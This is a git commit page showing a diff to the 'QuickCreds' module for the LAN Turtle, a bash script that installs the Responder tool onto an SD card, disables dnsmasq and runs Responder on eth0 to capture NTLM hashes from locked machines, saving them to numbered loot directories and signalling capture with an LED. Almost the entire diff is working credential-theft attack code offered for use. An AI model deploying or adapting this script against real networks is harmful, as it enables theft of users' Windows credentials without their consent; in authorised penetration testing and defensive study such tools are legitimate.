Fixed quickcreds with new responder size. (#43)
* Fixed quickcreds with new responder size. Forces use of SD card amongst some other small fixes. * corrected fixes * remove comments * fixed indexing * Fixed indexing * QuickCreds: Remove all trailing whitespace, fix indentation, drop unwanted comments * Removed odd comment Co-authored-by: Marc Egerton <foxtrot@malloc.me>pull/45/head
parent
e3ce49c4f3
commit
1452617da4
|
@ -1,8 +1,9 @@
|
||||||
#!/bin/bash /usr/lib/turtle/turtle_module
|
#!/bin/bash /usr/lib/turtle/turtle_module
|
||||||
VERSION="1.3"
|
VERSION="1.4"
|
||||||
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
|
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the LED will light solid. Author: Hak5Darren. Credit: Mubix."
|
||||||
CONF=/tmp/QuickCreds.form
|
CONF=/tmp/QuickCreds.form
|
||||||
|
|
||||||
|
# All "dialog" functionality is related to the Turtle shell
|
||||||
: ${DIALOG_OK=0}
|
: ${DIALOG_OK=0}
|
||||||
: ${DIALOG_CANCEL=1}
|
: ${DIALOG_CANCEL=1}
|
||||||
: ${DIALOG_HELP=2}
|
: ${DIALOG_HELP=2}
|
||||||
|
@ -10,14 +11,25 @@ CONF=/tmp/QuickCreds.form
|
||||||
: ${DIALOG_ITEM_HELP=4}
|
: ${DIALOG_ITEM_HELP=4}
|
||||||
: ${DIALOG_ESC=255}
|
: ${DIALOG_ESC=255}
|
||||||
|
|
||||||
function configure {
|
LOOTDIR="/root/loot/quickcreds/"
|
||||||
# dialog --title "QuickCreds" --msgbox "\n\
|
RESPLOG=$LOOTDIR"responder.log"
|
||||||
# Dependencies will be installed. An Internet connection is required.\n\
|
RESPROOT="/sd"
|
||||||
# Upon configuration creds will be saved to /root/loot/ on boot." 9 72
|
RESPTEMPDL="/tmp/ResponderDownload/"
|
||||||
|
RESPURL="https://github.com/lgandx/Responder/archive/master.zip"
|
||||||
|
RESPLOGDIR=$RESPROOT/"Responder/logs"
|
||||||
|
SLEEPTIMER="1"
|
||||||
|
|
||||||
dialog --title "QuickCreds" \
|
function configure {
|
||||||
--yesno "\nInstall dependencies and configure QuickCreds?\n\
|
# If SD card is mounted continue if not fail due to not enough space.
|
||||||
An Internet connection is required for installation.\n" 8 60
|
if grep -qs $RESPROOT /proc/mounts; then
|
||||||
|
/bin/echo "SD card is mounted."
|
||||||
|
else
|
||||||
|
/usr/bin/dialog --title "QuickCreds" --msgbox "An SD card is required to install this module." 9 72
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Ask if the user really wants to install the module and its dependencies
|
||||||
|
/usr/bin/dialog --title "QuickCreds" --yesno "\nInstall dependencies and configure QuickCreds?\nAn Internet connection is required for installation.\n" 8 60
|
||||||
response=$?
|
response=$?
|
||||||
case $response in
|
case $response in
|
||||||
0) ;;
|
0) ;;
|
||||||
|
@ -26,123 +38,133 @@ case $response in
|
||||||
esac
|
esac
|
||||||
|
|
||||||
# Check to see if QuickCreds has already been configured
|
# Check to see if QuickCreds has already been configured
|
||||||
if [[ -d /root/loot || -s /root/loot/responder.log ]];
|
if [[ -d "$LOOTDIR" || -s "$RESPLOG" ]]; then
|
||||||
then
|
/usr/bin/dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\nCreds are saved to $LOOTDIR.\nEnable this module to attack on boot." 9 72
|
||||||
dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\n\
|
|
||||||
Creds are saved to /root/loot.\nEnable this module to attack on boot." 9 72
|
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
|
|
||||||
# Check for Internet connection
|
# Check for Internet connection
|
||||||
ping -q -w 5 -c 1 lanturtle.com &> /dev/null && {
|
/bin/ping -q -w 5 -c 1 www.google.com &> /dev/null && {
|
||||||
:
|
:
|
||||||
} || {
|
} || {
|
||||||
dialog --title "QuickCreds" --msgbox "\n\
|
/usr/bin/dialog --title "QuickCreds" --msgbox "\nThe LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again." 9 72
|
||||||
The LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again. " 9 72
|
|
||||||
exit 1
|
exit 1
|
||||||
}
|
}
|
||||||
|
|
||||||
# Install dependencies
|
# Install dependencies
|
||||||
opkg update | dialog --progressbox "Updating opkg" 14 72
|
/bin/opkg update | /usr/bin/dialog --progressbox "Updating opkg" 14 72
|
||||||
|
|
||||||
if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
|
if [[ ! $(/bin/opkg list-installed | /bin/grep python-sqlite3) ]]; then
|
||||||
then
|
/bin/opkg install python-sqlite3 | /usr/bin/dialog --progressbox "Installing dependency python-sqlite3" 14 72
|
||||||
opkg install python-sqlite3 | dialog --progressbox "Installing dependency python-sqlite3" 14 72
|
|
||||||
fi
|
fi
|
||||||
|
|
||||||
if [[ ! $(opkg list-installed | grep screen) ]];
|
if [[ ! $(/bin/opkg list-installed | /bin/grep screen) ]]; then
|
||||||
then
|
/bin/opkg install screen | /usr/bin/dialog --progressbox "Installing dependency screen" 14 72
|
||||||
opkg install screen | dialog --progressbox "Installing dependency screen" 14 72
|
|
||||||
fi
|
fi
|
||||||
|
|
||||||
if [[ ! $(opkg list-installed | grep python-openssl) ]];
|
if [[ ! $(/bin/opkg list-installed | /bin/grep python-openssl) ]]; then
|
||||||
then
|
/bin/opkg install python-openssl | /usr/bin/dialog --progressbox "Installing dependency python-openssl" 14 72
|
||||||
opkg install python-openssl | dialog --progressbox "Installing dependency python-openssl" 14 72
|
|
||||||
fi
|
fi
|
||||||
|
|
||||||
if [[ ! $(opkg list-installed | grep coreutils-sleep) ]];
|
if [[ ! $(/bin/opkg list-installed | /bin/grep coreutils-sleep) ]]; then
|
||||||
then
|
/bin/opkg install coreutils-sleep | /usr/bin/dialog --progressbox "Installing dependency coreutils-sleep" 14 72
|
||||||
opkg install coreutils-sleep | dialog --progressbox "Installing dependency coreutils-sleep" 14 72
|
|
||||||
fi
|
fi
|
||||||
|
|
||||||
if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]];
|
if [[ ! $(/bin/opkg list-installed | /bin/grep unzip) ]]; then
|
||||||
then
|
/bin/opkg install unzip | /usr/bin/dialog --progressbox "Installing dependency unzip" 14 72
|
||||||
rm -rf /etc/turtle/Responder
|
fi
|
||||||
rm -rf /tmp/v2.3.3.5.tar.gz*
|
|
||||||
wget --progress=dot https://github.com/lgandx/Responder/archive/v2.3.3.5.tar.gz -P /tmp 2>&1 | dialog --progressbox "Download dependency responder" 14 72
|
# Check if Responder is installed (not the module available in the Turtle "GUI", but the tool taken straight from GitHub)
|
||||||
mkdir /etc/turtle/Responder
|
if [[ ! -d "$RESPROOT" || ! -s "$RESPROOT"Responder.py ]]; then
|
||||||
tar xzf /tmp/v2.3.3.5.tar.gz -C /etc/turtle/Responder 2>&1 | dialog --progressbox "Install dependency responder" 14 72
|
# Clean up
|
||||||
rm -rf /tmp/v2.3.3.5.tar.gz*
|
/bin/rm -rf "$RESPROOT"Responder/
|
||||||
|
/bin/rm -rf "$RESPTEMPDL"master.zip*
|
||||||
|
# Create new
|
||||||
|
/bin/mkdir -p "$RESPTEMPDL"
|
||||||
|
# Download and extract
|
||||||
|
/usr/bin/wget --progress=dot "$RESPURL" -P "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Download dependency responder" 14 72
|
||||||
|
# Unpack the GitHub download
|
||||||
|
/usr/bin/unzip "$RESPTEMPDL"master.zip -d "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Unpacking dependency responder" 14 72
|
||||||
|
/bin/rm "$RESPTEMPDL"Responder-master/tools/MultiRelay/bin/*.exe
|
||||||
|
/bin/mv "$RESPTEMPDL"Responder-master "$RESPTEMPDL"Responder
|
||||||
|
/bin/mv "$RESPTEMPDL"Responder "$RESPROOT"
|
||||||
|
/bin/rm -rf "$RESPTEMPDL"master.zip*
|
||||||
fi
|
fi
|
||||||
|
|
||||||
# Setup loot directory and complete setup
|
# Setup loot directory and complete setup
|
||||||
mkdir /root/loot
|
/bin/mkdir -p "$LOOTDIR"
|
||||||
touch /root/loot/responder.log
|
|
||||||
|
|
||||||
dialog --title "QuickCreds" --msgbox "\n\
|
/usr/bin/dialog --title "QuickCreds" --msgbox "\nConfiguration complete. Creds will be saved to $LOOTDIR\nEnable this module to have it start the attack on boot.\n" 9 72
|
||||||
Configuration complete. Creds will be saved to /root/loot\n\
|
|
||||||
Enable this module to have it start the attack on boot.\n" 9 72
|
|
||||||
}
|
|
||||||
|
|
||||||
function start {
|
|
||||||
# Stop on-off-on DHCP blink pattern script
|
|
||||||
echo "Stopping DHCP Detect Blink Script"
|
|
||||||
/etc/init.d/dhcp_detect stop
|
|
||||||
echo ""
|
|
||||||
echo "QuickCreds started."
|
|
||||||
echo "LED will blink rapidly while QuickCreds is running."
|
|
||||||
echo "LED will light solid upon NTLM hash capture."
|
|
||||||
echo ""
|
|
||||||
echo "If starting this module from the Turtle Shell menu,"
|
|
||||||
echo "press CTRL+C to return."
|
|
||||||
|
|
||||||
echo "Starting attack..." >> /root/loot/responder.log
|
|
||||||
|
|
||||||
# Create new numbered loot directory and symlink it from Responder logs
|
|
||||||
cd /root/loot
|
|
||||||
dircount=$(ls -lad /root/loot/* | wc -l)
|
|
||||||
mkdir /root/loot/$((dircount))
|
|
||||||
# Delete all current Responder logs
|
|
||||||
rm -rf /etc/turtle/Responder/logs
|
|
||||||
ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
|
|
||||||
|
|
||||||
# Stop dnsmasq
|
|
||||||
/etc/init.d/dnsmasq stop 1&> /dev/null
|
|
||||||
|
|
||||||
# Execute attack
|
|
||||||
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P'
|
|
||||||
|
|
||||||
# Blink upon hash capture
|
|
||||||
while true; do
|
|
||||||
# Grep for user creds and do not match on machine creds, machine usernames end in $
|
|
||||||
if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ];
|
|
||||||
then
|
|
||||||
if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
|
|
||||||
then
|
|
||||||
echo "Creds saved!" >> /root/loot/responder.log
|
|
||||||
#copy all responder logs to loot directory
|
|
||||||
cp /etc/turtle/Responder/logs/* /root/loot/$((dircount))
|
|
||||||
finished
|
|
||||||
fi
|
|
||||||
fi
|
|
||||||
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
|
|
||||||
sleep 1
|
|
||||||
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
|
|
||||||
sleep 1
|
|
||||||
done
|
|
||||||
}
|
}
|
||||||
|
|
||||||
function finished {
|
function finished {
|
||||||
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
|
/bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1
|
||||||
|
/bin/sync
|
||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
|
|
||||||
|
function start {
|
||||||
|
# Stop on-off-on DHCP blink pattern script, this is what causes the "Terminated" text to appear if running QuickCreds from within the Turtle module system in the Turtle "GUI"
|
||||||
|
/bin/echo "Stopping DHCP Detect Blink Script"
|
||||||
|
/etc/init.d/dhcp_detect stop
|
||||||
|
/bin/echo ""
|
||||||
|
/bin/echo "QuickCreds started."
|
||||||
|
/bin/echo "The orange LED will blink while QuickCreds is running."
|
||||||
|
/bin/echo "The orange LED will turn solid upon NTLM hash capture."
|
||||||
|
/bin/echo ""
|
||||||
|
/bin/echo "If starting this module from the Turtle Shell menu,"
|
||||||
|
/bin/echo "press CTRL+C to return."
|
||||||
|
|
||||||
|
# Create new numbered loot directory and symlink it from Responder logs
|
||||||
|
/bin/mkdir -p $LOOTDIR
|
||||||
|
cd $LOOTDIR
|
||||||
|
dircount=$(/bin/ls -lad $LOOTDIR/* | /usr/bin/wc -l)
|
||||||
|
# Adjust the number when creating the numbered lootdir for this session, if no existing dirs (i.e. wc -l = 0) then start with 1 instead of 0 otherwise there will be a gap between 0 and 2
|
||||||
|
if [[ $((dircount)) == 0 ]]; then dircount=1 ; fi
|
||||||
|
/bin/mkdir $LOOTDIR"Creds"$((dircount))
|
||||||
|
# Delete all current Responder logs
|
||||||
|
/bin/rm -rf $RESPLOGDIR
|
||||||
|
/bin/ln -s $LOOTDIR"Creds"$((dircount)) $RESPLOGDIR
|
||||||
|
|
||||||
|
# Saving interface info, surplus information and can be deleted
|
||||||
|
/sbin/ifconfig > $LOOTDIR"Creds"$((dircount))/ifconfig_dump.log
|
||||||
|
|
||||||
|
/bin/echo "Creds$((dircount)) - Initiating Responder attack..." >> $RESPLOG
|
||||||
|
|
||||||
|
# Stop dnsmasq
|
||||||
|
/bin/echo "Creds$((dircount)) - Stopping dnsmasq" >> $RESPLOG
|
||||||
|
/etc/init.d/dnsmasq stop 1&> /dev/null
|
||||||
|
|
||||||
|
# Execute attack
|
||||||
|
/bin/echo "Creds$((dircount)) - Starting screen and Responder" >> $RESPLOG
|
||||||
|
/usr/sbin/screen -dmS responder /bin/bash -c 'cd /sd/Responder; /usr/bin/python /sd/Responder/Responder.py -I eth0 -w -r -d -P'
|
||||||
|
|
||||||
|
/bin/echo "Creds$((dircount)) - LED blink pattern during attack enabled" >> $RESPLOG
|
||||||
|
# Blink upon hash capture
|
||||||
|
while true; do
|
||||||
|
# Grep for user creds and do not match on machine creds, machine usernames end in $
|
||||||
|
if [[ $(/bin/grep -v '\$:' $RESPLOGDIR/*NTLM* 2>/dev/null) ]]; then
|
||||||
|
/bin/echo "Creds$((dircount)) - Found user creds NTLM file in the logs directory!" >> $RESPLOG
|
||||||
|
/bin/echo "Creds$((dircount)) - Creds obtained and saved" >> $RESPLOG
|
||||||
|
#Copy all responder logs to loot directory
|
||||||
|
/bin/echo "Creds$((dircount)) - Copying the Responder native logs to loot directory" >> $RESPLOG
|
||||||
|
/bin/cp $RESPLOGDIR/* $LOOTDIR"Creds"$((dircount))
|
||||||
|
/bin/echo "Creds$((dircount)) - Calling the finished function" >> $RESPLOG
|
||||||
|
finished
|
||||||
|
fi
|
||||||
|
/bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1
|
||||||
|
/bin/sleep $SLEEPTIMER
|
||||||
|
/bin/echo 0 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1
|
||||||
|
/bin/sleep $SLEEPTIMER
|
||||||
|
done
|
||||||
|
}
|
||||||
|
|
||||||
function stop {
|
function stop {
|
||||||
kill $(ps | grep [R]esponder | awk {'print $1'})
|
/bin/kill $(/bin/ps | /bin/grep [R]esponder | /usr/bin/awk {'print $1'})
|
||||||
/etc/init.d/dnsmasq start 1&> /dev/null
|
/etc/init.d/dnsmasq start 1&> /dev/null
|
||||||
echo "QuickCreds Stopped"
|
/bin/echo "QuickCreds Stopped"
|
||||||
}
|
}
|
||||||
|
|
||||||
function status {
|
function status {
|
||||||
if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi
|
if [[ $(/bin/ps | /bin/grep -w [R]esponder.py) ]]; then /bin/echo "1"; else /bin/echo "0"; fi
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue